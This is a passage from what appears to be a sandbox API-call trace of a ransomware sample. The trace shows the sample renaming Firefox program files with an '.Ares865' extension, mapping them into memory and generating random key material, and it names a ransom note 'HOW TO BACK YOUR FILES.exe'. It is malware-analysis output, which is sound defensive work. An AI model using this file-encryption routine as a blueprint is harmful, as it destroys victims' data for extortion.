lpString1=0x2cce44e, lpString2="nssdbm3.chk" | out: lpString1="nssdbm3.chk") returned="nssdbm3.chk" [0127.134] lstrlenW (lpString="nssdbm3.chk") returned 11 [0127.134] lstrlenW (lpString="Ares865") returned 7 [0127.134] lstrcmpiW (lpString1="bm3.chk", lpString2="Ares865") returned 1 [0127.134] lstrlenW (lpString=".dll") returned 4 [0127.134] lstrcmpiW (lpString1="nssdbm3.chk", lpString2=".dll") returned 1 [0127.134] lstrlenW (lpString=".lnk") returned 4 [0127.134] lstrcmpiW (lpString1="nssdbm3.chk", lpString2=".lnk") returned 1 [0127.134] lstrlenW (lpString=".ini") returned 4 [0127.134] lstrcmpiW (lpString1="nssdbm3.chk", lpString2=".ini") returned 1 [0127.134] lstrlenW (lpString=".sys") returned 4 [0127.134] lstrcmpiW (lpString1="nssdbm3.chk", lpString2=".sys") returned 1 [0127.135] lstrlenW (lpString="nssdbm3.chk") returned 11 [0127.135] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk.Ares865") returned 58 [0127.135] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk" (normalized: "c:\\program files (x86)\\mozilla firefox\\nssdbm3.chk"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\nssdbm3.chk.ares865"), dwFlags=0x1) returned 1 [0127.137] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\nssdbm3.chk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0127.137] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=899) returned 1 [0127.138] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0127.138] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0127.138] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.138] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x690, lpName=0x0) returned 0x170 [0127.140] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x690) returned 0x190000 [0127.140] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0127.141] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0127.141] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.142] lstrcpyW (in: lpString1=0x2cce44e, lpString2="nssdbm3.dll" | out: lpString1="nssdbm3.dll") returned="nssdbm3.dll" [0127.142] lstrlenW (lpString="nssdbm3.dll") returned 11 [0127.142] lstrlenW (lpString="Ares865") returned 7 [0127.142] lstrcmpiW (lpString1="bm3.dll", lpString2="Ares865") returned 1 [0127.142] lstrlenW (lpString=".dll") returned 4 [0127.142] lstrcmpiW (lpString1="nssdbm3.dll", lpString2=".dll") returned 1 [0127.142] lstrlenW (lpString=".lnk") returned 4 [0127.142] lstrcmpiW (lpString1="nssdbm3.dll", lpString2=".lnk") returned 1 [0127.142] lstrlenW (lpString=".ini") returned 4 [0127.142] lstrcmpiW (lpString1="nssdbm3.dll", lpString2=".ini") returned 1 [0127.142] lstrlenW (lpString=".sys") returned 4 [0127.142] lstrcmpiW (lpString1="nssdbm3.dll", lpString2=".sys") returned 1 [0127.142] lstrlenW (lpString="nssdbm3.dll") returned 11 [0127.142] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.dll.Ares865") returned 58 [0127.142] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\nssdbm3.dll"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\nssdbm3.dll.ares865"), dwFlags=0x1) returned 1 [0127.145] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\nssdbm3.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0127.145] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=92272) returned 1 [0127.145] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0127.146] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0127.146] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.146] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16b70, lpName=0x0) returned 0x170 [0127.147] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16b70) returned 0x190000 [0127.151] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0127.152] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0127.152] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.154] lstrcpyW (in: lpString1=0x2cce44e, lpString2="omni.ja" | out: lpString1="omni.ja") returned="omni.ja" [0127.154] lstrlenW (lpString="omni.ja") returned 7 [0127.154] lstrlenW (lpString="Ares865") returned 7 [0127.154] lstrlenW (lpString=".dll") returned 4 [0127.154] lstrcmpiW (lpString1="omni.ja", lpString2=".dll") returned 1 [0127.154] lstrlenW (lpString=".lnk") returned 4 [0127.154] lstrcmpiW (lpString1="omni.ja", lpString2=".lnk") returned 1 [0127.154] lstrlenW (lpString=".ini") returned 4 [0127.154] lstrcmpiW (lpString1="omni.ja", lpString2=".ini") returned 1 [0127.154] lstrlenW (lpString=".sys") returned 4 [0127.154] lstrcmpiW (lpString1="omni.ja", lpString2=".sys") returned 1 [0127.154] lstrlenW (lpString="omni.ja") returned 7 [0127.154] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja.Ares865") returned 54 [0127.155] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja" (normalized: "c:\\program files (x86)\\mozilla firefox\\omni.ja"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\omni.ja.ares865"), dwFlags=0x1) returned 1 [0127.157] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\omni.ja.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0127.157] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7806293) returned 1 [0127.157] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0127.158] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0127.158] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.158] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x772060, lpName=0x0) returned 0x170 [0127.160] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x600000, dwNumberOfBytesToMap=0x172060) returned 0x3030000 [0127.318] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0127.319] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0127.319] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.361] lstrcpyW (in: lpString1=0x2cce44e, lpString2="platform.ini" | out: lpString1="platform.ini") returned="platform.ini" [0127.361] lstrlenW (lpString="platform.ini") returned 12 [0127.361] lstrlenW (lpString="Ares865") returned 7 [0127.361] lstrcmpiW (lpString1="orm.ini", lpString2="Ares865") returned 1 [0127.361] lstrlenW (lpString=".dll") returned 4 [0127.361] lstrcmpiW (lpString1="platform.ini", lpString2=".dll") returned 1 [0127.361] lstrlenW (lpString=".lnk") returned 4 [0127.361] lstrcmpiW (lpString1="platform.ini", lpString2=".lnk") returned 1 [0127.361] lstrlenW (lpString=".ini") returned 4 [0127.361] lstrcmpiW (lpString1="platform.ini", lpString2=".ini") returned 1 [0127.361] lstrlenW (lpString=".sys") returned 4 [0127.361] lstrcmpiW (lpString1="platform.ini", lpString2=".sys") returned 1 [0127.361] lstrlenW (lpString="platform.ini") returned 12 [0127.362] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini.Ares865") returned 59 [0127.362] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\platform.ini"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\platform.ini.ares865"), dwFlags=0x1) returned 1 [0127.365] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\platform.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0127.365] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=140) returned 1 [0127.365] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0127.366] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0127.366] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.366] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x170 [0127.369] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x190000 [0127.370] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0127.370] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0127.370] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.371] lstrcpyW (in: lpString1=0x2cce44e, lpString2="plugin-container.exe" | out: lpString1="plugin-container.exe") returned="plugin-container.exe" [0127.371] lstrlenW (lpString="plugin-container.exe") returned 20 [0127.371] lstrlenW (lpString="Ares865") returned 7 [0127.371] lstrcmpiW (lpString1="ner.exe", lpString2="Ares865") returned 1 [0127.371] lstrlenW (lpString=".dll") returned 4 [0127.371] lstrcmpiW (lpString1="plugin-container.exe", lpString2=".dll") returned 1 [0127.371] lstrlenW (lpString=".lnk") returned 4 [0127.371] lstrcmpiW (lpString1="plugin-container.exe", lpString2=".lnk") returned 1 [0127.371] lstrlenW (lpString=".ini") returned 4 [0127.371] lstrcmpiW (lpString1="plugin-container.exe", lpString2=".ini") returned 1 [0127.371] lstrlenW (lpString=".sys") returned 4 [0127.371] lstrcmpiW (lpString1="plugin-container.exe", lpString2=".sys") returned 1 [0127.371] lstrlenW (lpString="plugin-container.exe") returned 20 [0127.372] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\plugin-container.exe.Ares865") returned 67 [0127.372] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\plugin-container.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\plugin-container.exe"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\plugin-container.exe.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\plugin-container.exe.ares865"), dwFlags=0x1) returned 1 [0127.373] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\plugin-container.exe.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\plugin-container.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0127.373] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=18544) returned 1 [0127.373] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0127.374] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0127.374] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.374] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b70, lpName=0x0) returned 0x170 [0127.376] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4b70) returned 0x190000 [0127.377] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0127.378] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0127.378] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.379] lstrcpyW (in: lpString1=0x2cce44e, lpString2="plugin-hang-ui.exe" | out: lpString1="plugin-hang-ui.exe") returned="plugin-hang-ui.exe" [0127.379] lstrlenW (lpString="plugin-hang-ui.exe") returned 18 [0127.379] lstrlenW (lpString="Ares865") returned 7 [0127.379] lstrcmpiW (lpString1="-ui.exe", lpString2="Ares865") returned 1 [0127.379] lstrlenW (lpString=".dll") returned 4 [0127.379] lstrcmpiW (lpString1="plugin-hang-ui.exe", lpString2=".dll") returned 1 [0127.379] lstrlenW (lpString=".lnk") returned 4 [0127.379] lstrcmpiW (lpString1="plugin-hang-ui.exe", lpString2=".lnk") returned 1 [0127.379] lstrlenW (lpString=".ini") returned 4 [0127.379] lstrcmpiW (lpString1="plugin-hang-ui.exe", lpString2=".ini") returned 1 [0127.379] lstrlenW (lpString=".sys") returned 4 [0127.379] lstrcmpiW (lpString1="plugin-hang-ui.exe", lpString2=".sys") returned 1 [0127.379] lstrlenW (lpString="plugin-hang-ui.exe") returned 18 [0127.379] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\plugin-hang-ui.exe.Ares865") returned 65 [0127.379] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\plugin-hang-ui.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\plugin-hang-ui.exe"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\plugin-hang-ui.exe.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\plugin-hang-ui.exe.ares865"), dwFlags=0x1) returned 1 [0127.381] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\plugin-hang-ui.exe.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\plugin-hang-ui.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0127.381] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28272) returned 1 [0127.382] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0127.382] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0127.382] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.382] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7170, lpName=0x0) returned 0x170 [0127.384] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7170) returned 0x190000 [0127.386] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0127.386] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0127.386] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.387] lstrcpyW (in: lpString1=0x2cce44e, lpString2="precomplete.Ares865" | out: lpString1="precomplete.Ares865") returned="precomplete.Ares865" [0127.387] lstrlenW (lpString="precomplete.Ares865") returned 19 [0127.387] lstrlenW (lpString="Ares865") returned 7 [0127.387] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0127.387] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf1314a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf1314a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x13c55480, ftLastWriteTime.dwHighDateTime=0x1ced1dd, nFileSizeHigh=0x0, nFileSizeLow=0x8f3b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="removed-files", cAlternateFileName="REMOVE~1")) returned 1 [0127.387] lstrcmpiW (lpString1="removed-files", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0127.387] lstrcmpiW (lpString1="removed-files", lpString2="aoldtz.exe") returned 1 [0127.388] lstrcpyW (in: lpString1=0x2cce44e, lpString2="removed-files" | out: lpString1="removed-files") returned="removed-files" [0127.388] lstrlenW (lpString="removed-files") returned 13 [0127.388] lstrlenW (lpString="Ares865") returned 7 [0127.388] lstrcmpiW (lpString1="d-files", lpString2="Ares865") returned 1 [0127.388] lstrlenW (lpString=".dll") returned 4 [0127.388] lstrcmpiW (lpString1="removed-files", lpString2=".dll") returned 1 [0127.388] lstrlenW (lpString=".lnk") returned 4 [0127.388] lstrcmpiW (lpString1="removed-files", lpString2=".lnk") returned 1 [0127.388] lstrlenW (lpString=".ini") returned 4 [0127.388] lstrcmpiW (lpString1="removed-files", lpString2=".ini") returned 1 [0127.388] lstrlenW (lpString=".sys") returned 4 [0127.388] lstrcmpiW (lpString1="removed-files", lpString2=".sys") returned 1 [0127.388] lstrlenW (lpString="removed-files") returned 13 [0127.388] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files.Ares865") returned 60 [0127.388] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files" (normalized: "c:\\program files (x86)\\mozilla firefox\\removed-files"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\removed-files.ares865"), dwFlags=0x1) returned 1 [0127.390] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\removed-files.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0127.390] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=36667) returned 1 [0127.390] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0127.391] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0127.391] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.391] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9240, lpName=0x0) returned 0x170 [0127.392] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9240) returned 0x190000 [0127.395] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0127.395] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0127.395] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.396] lstrcpyW (in: lpString1=0x2cce44e, lpString2="softokn3.chk" | out: lpString1="softokn3.chk") returned="softokn3.chk" [0127.396] lstrlenW (lpString="softokn3.chk") returned 12 [0127.396] lstrlenW (lpString="Ares865") returned 7 [0127.396] lstrcmpiW (lpString1="kn3.chk", lpString2="Ares865") returned 1 [0127.396] lstrlenW (lpString=".dll") returned 4 [0127.396] lstrcmpiW (lpString1="softokn3.chk", lpString2=".dll") returned 1 [0127.397] lstrlenW (lpString=".lnk") returned 4 [0127.397] lstrcmpiW (lpString1="softokn3.chk", lpString2=".lnk") returned 1 [0127.397] lstrlenW (lpString=".ini") returned 4 [0127.397] lstrcmpiW (lpString1="softokn3.chk", lpString2=".ini") returned 1 [0127.397] lstrlenW (lpString=".sys") returned 4 [0127.397] lstrcmpiW (lpString1="softokn3.chk", lpString2=".sys") returned 1 [0127.397] lstrlenW (lpString="softokn3.chk") returned 12 [0127.397] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk.Ares865") returned 59 [0127.397] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk" (normalized: "c:\\program files (x86)\\mozilla firefox\\softokn3.chk"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\softokn3.chk.ares865"), dwFlags=0x1) returned 1 [0127.399] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\softokn3.chk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0127.399] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=899) returned 1 [0127.400] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0127.400] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0127.400] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.401] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x690, lpName=0x0) returned 0x170 [0127.402] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x690) returned 0x190000 [0127.403] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0127.404] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0127.404] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.404] lstrcpyW (in: lpString1=0x2cce44e, lpString2="softokn3.dll" | out: lpString1="softokn3.dll") returned="softokn3.dll" [0127.404] lstrlenW (lpString="softokn3.dll") returned 12 [0127.404] lstrlenW (lpString="Ares865") returned 7 [0127.404] lstrcmpiW (lpString1="kn3.dll", lpString2="Ares865") returned 1 [0127.404] lstrlenW (lpString=".dll") returned 4 [0127.404] lstrcmpiW (lpString1="softokn3.dll", lpString2=".dll") returned 1 [0127.404] lstrlenW (lpString=".lnk") returned 4 [0127.404] lstrcmpiW (lpString1="softokn3.dll", lpString2=".lnk") returned 1 [0127.404] lstrlenW (lpString=".ini") returned 4 [0127.404] lstrcmpiW (lpString1="softokn3.dll", lpString2=".ini") returned 1 [0127.404] lstrlenW (lpString=".sys") returned 4 [0127.405] lstrcmpiW (lpString1="softokn3.dll", lpString2=".sys") returned 1 [0127.405] lstrlenW (lpString="softokn3.dll") returned 12 [0127.405] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.dll.Ares865") returned 59 [0127.405] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\softokn3.dll"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\softokn3.dll.ares865"), dwFlags=0x1) returned 1 [0127.406] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\softokn3.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0127.406] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=153712) returned 1 [0127.407] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0127.407] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0127.407] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.408] CreateFileMappingW (hFile=0x118, 